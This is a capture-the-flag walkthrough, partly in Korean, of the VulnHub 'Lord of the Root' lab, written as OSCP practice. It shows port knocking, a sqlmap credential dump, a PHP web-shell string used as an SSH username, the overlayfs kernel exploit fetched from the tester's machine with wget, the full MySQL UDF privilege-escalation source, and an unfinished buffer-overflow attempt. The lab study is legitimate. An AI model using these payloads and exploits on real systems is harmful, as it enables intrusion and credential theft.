OSCP/Vulnahub
28. Lord of the Root
takudaddy
2021. 4. 12. 23:16
INFO
Name : Lord of the Root
Entry : 28 / 35
Level : Easy / Intermediate
VulnHub URL : https://www.vulnhub.com/entry/lord-of-the-root-101,129/
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used Workstation this time.
DESCRIPTON
I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP.
This is a boot-to-root machine will not require any guest interaction.
There are two designed methods for privilege escalation.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. EXPLOITATION
4. PRIVILEGE ESCALATION
5. 다른 방법 (다 실패)
1. DISCOVERY
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.10.45 08:00:27:a6:87:0f 1 60 PCS Systemtechnik GmbH
2. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
┌──(root💀takudaddy)-[~]
└─# ssh '<?php system($_GET["cmd"]); ?>'@192.168.10.45 130 ⨯
.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
<?php system($_GET["cmd"]); ?>@192.168.10.45's password:
LOTR
knock Friend To Enter
Easy as 1,2,3
knocking 하라는 건가?
시퀀스 번호가 1,2,3?
┌──(root💀takudaddy)-[~]
└─# knock 192.168.10.45 1 2 3
┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.10.45
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 12:30 KST
Nmap scan report for 192.168.10.45
Host is up (0.00017s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 08:00:27:A6:87:0F (Oracle VirtualBox virtual NIC)
맞는 듯 하다.
1337 포트가 열렸다.
참고로
knocking 말고 nmap으로
하는 방법은
┌──(root💀takudaddy)-[/study]
└─# nmap -r -Pn 192.168.10.45 -p 1,2,3
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 13:35 KST
Nmap scan report for 192.168.10.45
Host is up (0.00026s latency).
PORT STATE SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 08:00:27:A6:87:0F (Oracle VirtualBox virtual NIC)
-r: Scan ports consecutively - don't randomize
-Pn: Treat all hosts as online -- skip host discovery
-p 1,2,3: Scan against ports 1,2 and 3
한 뒤 -p- 로 검색
3. WEB ENUMERATION
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ http://192.168.10.45:1337/404.html (CODE:200|SIZE:116)
+ http://192.168.10.45:1337/index.html (CODE:200|SIZE:64)
/icons/ (Status: 403) [Size: 288]
/images/ (Status: 200) [Size: 1353]
/404.html (Status: 200) [Size: 116]
/index.html (Status: 200) [Size: 64]
/server-status/ (Status: 403) [Size: 296]
HTTP/1.1 200 OK
Date: Mon, 12 Apr 2021 03:53:22 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 116
Connection: close
Content-Type: text/html
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
┌──(root💀takudaddy)-[~]
└─# echo THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
┌──(root💀takudaddy)-[~]
└─# echo Lzk3ODM0NTIxMC9pbmRleC5waHA= | base64 -d
/978345210/index.php
3. EXPLOITATION
┌──(root💀takudaddy)-[/study]
└─# sqlmap --level=5 --risk=3 --url=http://192.168.10.45:1337/978345210/index.php --data="username=legolas&password=a&submit=+login+" --dump all --batch
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[13:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:34:09] [INFO] adjusting time delay to 1 second due to good response times
Webapp
[13:34:26] [INFO] fetching tables for database: 'Webapp'
[13:34:26] [INFO] fetching number of tables for database 'Webapp'
[13:34:26] [INFO] retrieved: 1
[13:34:27] [INFO] retrieved: Users
[13:34:42] [INFO] fetching columns for table 'Users' in database 'Webapp'
[13:34:42] [INFO] retrieved: 3
[13:34:45] [INFO] retrieved: id
[13:34:51] [INFO] retrieved: username
[13:35:13] [INFO] retrieved: password
[13:35:41] [INFO] fetching entries for table 'Users' in database 'Webapp'
[13:35:41] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[13:35:41] [INFO] retrieved: 5
[13:35:43] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[13:35:45] [INFO] retrieved: iwilltakethering
[13:36:34] [INFO] retrieved: frodo
[13:36:52] [INFO] retrieved: 2
[13:36:55] [INFO] retrieved: MyPreciousR00t
[13:37:43] [INFO] retrieved: smeagol
[13:38:04] [INFO] retrieved: 3
[13:38:07] [INFO] retrieved: AndMySword
[13:38:44] [INFO] retrieved: aragorn
[13:39:04] [INFO] retrieved: 4
[13:39:08] [INFO] retrieved: AndMyBow
[13:39:40] [INFO] retrieved: legolas
[13:40:02] [INFO] retrieved: 5
[13:40:05] [INFO] retrieved: AndMyAxe
[13:40:34] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password | username |
+----+------------------+----------+
| 1 | iwilltakethering | frodo |
| 2 | MyPreciousR00t | smeagol |
| 3 | AndMySword | aragorn |
| 4 | AndMyBow | legolas |
| 5 | AndMyAxe | gimli |
+----+------------------+----------+
┌──(root💀takudaddy)-[/study]
└─# ssh smeagol@192.168.10.45 130 ⨯
.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
smeagol@192.168.10.45's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
* Documentation: https://help.ubuntu.com/
.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
__ __ .__ ___________ .__ .___
/ \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/
\ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ |
\ /\ ___/| |_\ \__( <_> ) Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ |
\__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ |
\/ \/ \/ \/ \/ \/ \/ \/ \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$
smeagol@LordOfTheRoot:~$ cat .bash_history
su -
sudo /etc/passwod
visudo
exit
침투 성공
4. PRIVILEGE ESCALATION
smeagol@192.168.10.45's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
smeagol@LordOfTheRoot:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 athlon i686 GNU/Linux
┌──(root💀takudaddy)-[/study]
└─# searchsploit -m linux/local/39166.c 2 ⚙
Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/39166
Path: /usr/share/exploitdb/exploits/linux/local/39166.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /study/39166.c
smeagol@LordOfTheRoot:~$ wget http://192.168.10.10/39166.c
--2021-04-11 23:38:49-- http://192.168.10.10/39166.c
Connecting to 192.168.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [text/x-csrc]
Saving to: ‘39166.c’
100%[===================================================>] 2,789 --.-K/s in 0s
2021-04-11 23:38:49 (508 MB/s) - ‘39166.c’ saved [2789/2789]
smeagol@LordOfTheRoot:~$
smeagol@LordOfTheRoot:~$ ls
39166.c Documents examples.desktop Pictures Templates
Desktop Downloads Music Public Videos
smeagol@LordOfTheRoot:~$ gcc -o attack 39166.c
smeagol@LordOfTheRoot:~$
smeagol@LordOfTheRoot:~$ chmod +x attack
smeagol@LordOfTheRoot:~$ ./attack
root@LordOfTheRoot:~#
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# cd /root
root@LordOfTheRoot:/root# ls
buf buf.c Flag.txt other other.c switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
끝
다른방법
┌──(root💀takudaddy)-[~]
└─# searchsploit -m linux/local/1518.c 1 ⚙
Exploit: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
URL: https://www.exploit-db.com/exploits/1518
Path: /usr/share/exploitdb/exploits/linux/local/1518.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /root/1518.c
┌──(root💀takudaddy)-[~]
└─# cat 1518.c 1 ⚙
/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*
* E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
*
*/
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
// milw0rm.com [2006-02-20]
smeagol@LordOfTheRoot:/tmp$ cat source.c
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
smeagol@LordOfTheRoot:/tmp$
smeagol@LordOfTheRoot:/tmp$ gcc -g -c source.c
smeagol@LordOfTheRoot:/tmp$ gcc -g -shared -Wl,-soname,source.so -o source.so source.c -lc
*위 명령어 참고*
$ gcc -g -shared -Wl,-soname,source.so -o source.so source.c -lc (W'l' = W'L', -'l'c = 'L'c)
둘다 숫자 1이 아니라 알파벳 L의 소문자임
smeagol@LordOfTheRoot:/tmp$
smeagol@LordOfTheRoot:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Webapp |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use mysql;
mysql> create table root(line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into root values(load_file('/home/smeagol/source.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from root into dumpfile '/usr/lib/mysql/plugin/source.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function cmd returns integer soname 'source.so';
ERROR 1127 (HY000): Can't find symbol 'cmd' in library
실패
BOF
smeagol@LordOfTheRoot:~$ find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 35300 Jul 15 2015 /bin/su
-rwsr-xr-x 1 root root 88752 Aug 4 2015 /bin/mount
-rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 67704 Aug 4 2015 /bin/umount
-rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 5150 Sep 22 2015 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door3/file
-rwsr-xr-x 1 root root 18168 Mar 4 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 45420 Jul 15 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 35916 Jul 15 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 44620 Jul 15 2015 /usr/bin/chfn
-rwsr-xr-x 1 root root 66252 Jul 15 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 30984 Jul 15 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root lpadmin 13672 Jun 4 2015 /usr/bin/lppasswd
-rwsr-xr-x 1 root root 18136 May 7 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-xr-x 1 root root 156708 Mar 12 2015 /usr/bin/sudo
-rwsr-sr-x 1 root root 9532 Jun 22 2015 /usr/bin/X
-rwsr-xr-x 1 root root 9612 Feb 25 2015 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 492972 Aug 17 2015 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Nov 25 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9804 Mar 4 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 13840 Jul 28 2015 /usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
-rwsr-sr-x 1 libuuid libuuid 17996 Aug 4 2015 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
smeagol@LordOfTheRoot:~$ find / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18208 Jul 15 2015 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 329144 Aug 17 2015 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 49420 Jul 15 2015 /usr/bin/chage
-rwxr-sr-x 1 root mail 9704 Dec 3 2012 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root mail 9704 Dec 3 2012 /usr/bin/mail-lock
-rwxr-sr-x 1 root tty 18056 Aug 4 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9704 Dec 3 2012 /usr/bin/mail-unlock
-rwxr-sr-x 1 root mail 13960 Dec 6 2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 root root 9532 Jun 22 2015 /usr/bin/X
-rwxr-sr-x 1 root utmp 14004 Nov 22 2013 /usr/lib/libvte-2.90-9/gnome-pty-helper
-rwxr-sr-x 1 root mail 13888 Oct 20 2014 /usr/lib/evolution/camel-lock-helper-1.2
-rwxr-sr-x 1 root utmp 9468 Oct 5 2012 /usr/lib/utempter/utempter
-rwsr-sr-x 1 libuuid libuuid 17996 Aug 4 2015 /usr/sbin/uuidd
-rwxr-sr-x 1 root shadow 30432 Jan 31 2014 /sbin/unix_chkpwd
smeagol@LordOfTheRoot:/SECRET$ ls -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 .
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ..
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 door1
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 door2
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 door3
./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file
./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file
./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Apr 11 23:39 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file
smeagol@LordOfTheRoot:/SECRET$
셋 다 컴파일된 파일.
BOF 공격을 시도해본다.
1. Offset 찾기
smeagol@LordOfTheRoot:/SECRET/door1$ ls
file
smeagol@LordOfTheRoot:/SECRET/door1$ ./file
Syntax: ./file <input string>
smeagol@LordOfTheRoot:/SECRET/door1$ file file
file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
smeagol@LordOfTheRoot:/SECRET/door1$ ./file $(python -c 'print "A"*171')
Illegal instruction (core dumped)
smeagol@LordOfTheRoot:/SECRET/door1$ ./file $(python -c 'print "A"*172')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c 'print "AA"*85')
smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c 'print "AA"*86')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:/SECRET/door3$ ./file $(python -c 'print "%8x"*57')
Illegal instruction (core dumped)
smeagol@LordOfTheRoot:/SECRET/door3$ ./file $(python -c 'print "%8x"*58')
Segmentation fault (core dumped)
offset 값이 각각 171 / 85 /57 인듯.
재 확인 해본다.
1. 175 바이트의 패턴을 생성해주고
┌──(root💀takudaddy)-[~]
└─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 175
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A
2. 디버거로 파일을 열어 패턴을 돌려보면 세그먼트 오류가 난 메모리 주소가 나오는데
smeagol@LordOfTheRoot:/SECRET/door1$ gdb file -q
Reading symbols from file...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A
Starting program: /SECRET/door1/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A
Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()
(gdb)
3. 해당 값을 pattern_offset으로 돌려보면
┌──(root💀takudaddy)-[/study]
└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41376641
[*] Exact match at offset 171
171 맞다.
2. EIP 제어 가능한지 확인
meagol@LordOfTheRoot:/SECRET/door1$ gdb -q file
Reading symbols from file...(no debugging symbols found)...done.
(gdb) run $(python -c 'print "A"*171+"B"*4+"C"*(200-171-4)')
`/SECRET/door1/file' has changed; re-reading symbols.
(no debugging symbols found)
Starting program: /SECRET/door1/file $(python -c 'print "A"*171+"B"*4+"C"*(200-171-4)')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info reg
eax 0x0 0
ecx 0xbfffc8b0 -1073755984
edx 0xbfffb185 -1073761915
ebx 0xb776b000 -1216958464
esp 0xbfffb170 0xbfffb170
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x42424242 0x42424242
eflags 0x10202 [ IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
EIP가 42424242(BBBB)로 채워짐을 확인.
3. ASLR 걸려 있는지 확인
ASLR은 메모리 보호 기법으로
0 이면 ASLR 해제
1이면 랜덤스택 / 라이브러리 활성화
2 면 랜덤스택 / 라이브러리 / 힙 활성화
smeagol@LordOfTheRoot:/SECRET/door1$ cat /proc/sys/kernel/randomize_va_space
2
활성화 중이니 주소가 랜덤으로 바뀐다.
이런 경우 문제를 풀기가 어렵다.
일단 계속 진행해보는데,
4. JMP ESP 확인
이 주소값은 하나밖에 없고 절대 변하지 않기 때문에
쉘 코드를 실행함에 있어 중요한 포인트인데
이 프로그램에는 없는 것으로 보아
쉘 코드를 가리키도록 특정 EIP 주소를
지정하는 것을 방지한 것 같다.
스택 공간을 채우기 위해
공격 구문 마지막에 NOP(\x90)을 넉넉히 넣어준다.
(gdb) run $(python -c 'print "A"*171 + "B"*4 + "\x90"*1000')
`/SECRET/door1/file' has changed; re-reading symbols.
(no debugging symbols found)
Starting program: /SECRET/door1/file $(python -c 'print "A"*171 + "B"*4 + "\x90"*1000')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/s $esp
0xbff1e8a0: '\220' <repeats 200 times>...
(gdb) x/s $esp
0xbff1e8a0: '\220' <repeats 200 times>...
(gdb) x/s $esp
0xbff1e8a0: '\220' <repeats 200 times>...
(gdb) 현재의 ESP 주소를 사용해 쉘코드를 올려본다.
하지만 결국 실패.
door 123이 서로 계속 스위칭 되면서
작업을 이어나갈 수가 없다.
반복문으로 돌려보면
smeagol@LordOfTheRoot:/SECRET$ for i in 1 2 3 ; do echo $i; ./door$i/file $(python -c 'print "A" * 175'); done
1
2
3
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:/SECRET$
바뀜
다른 방법을 찾아야 함
smeagol@LordOfTheRoot:/SECRET$ ldd door1/file
linux-gate.so.1 => (0xb7721000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000)
/lib/ld-linux.so.2 (0xb7723000)
smeagol@LordOfTheRoot:/SECRET$ ldd door1/file
linux-gate.so.1 => (0xb7785000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75be000)
/lib/ld-linux.so.2 (0xb7787000)
smeagol@LordOfTheRoot:/SECRET$ ulimits -s
ulimits: command not found
smeagol@LordOfTheRoot:/SECRET$ ulimit -s
8192
smeagol@LordOfTheRoot:/SECRET$ ulimit -s unlimited
smeagol@LordOfTheRoot:/SECRET$ ulimit -s
unlimited
smeagol@LordOfTheRoot:/SECRET$ ldd door1/file
linux-gate.so.1 => (0x40024000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x4003d000)
/lib/ld-linux.so.2 (0x40000000)
smeagol@LordOfTheRoot:/SECRET$ ldd door1/file
linux-gate.so.1 => (0x40024000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x4003d000)
/lib/ld-linux.so.2 (0x40000000)
peda를 깐다.
smeagol@LordOfTheRoot:~$ git clone https://github.com/longld/peda.git ~/peda
Cloning into '/home/smeagol/peda'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 382 (delta 2), reused 2 (delta 0), pack-reused 373
Receiving objects: 100% (382/382), 290.84 KiB | 0 bytes/s, done.
Resolving deltas: 100% (231/231), done.
Checking connectivity... done.
smeagol@LordOfTheRoot:~$ echo "source ~/peda/peda.py" >> ~/.gdbinit
smeagol@LordOfTheRoot:~$
smeagol@LordOfTheRoot:~$
smeagol@LordOfTheRoot:~$ cd /SECRET/door1
smeagol@LordOfTheRoot:/SECRET/door1$ gdb -q file
Reading symbols from file...(no debugging symbols found)...done.
gdb-peda$
gdb-peda$ pattern_create 500
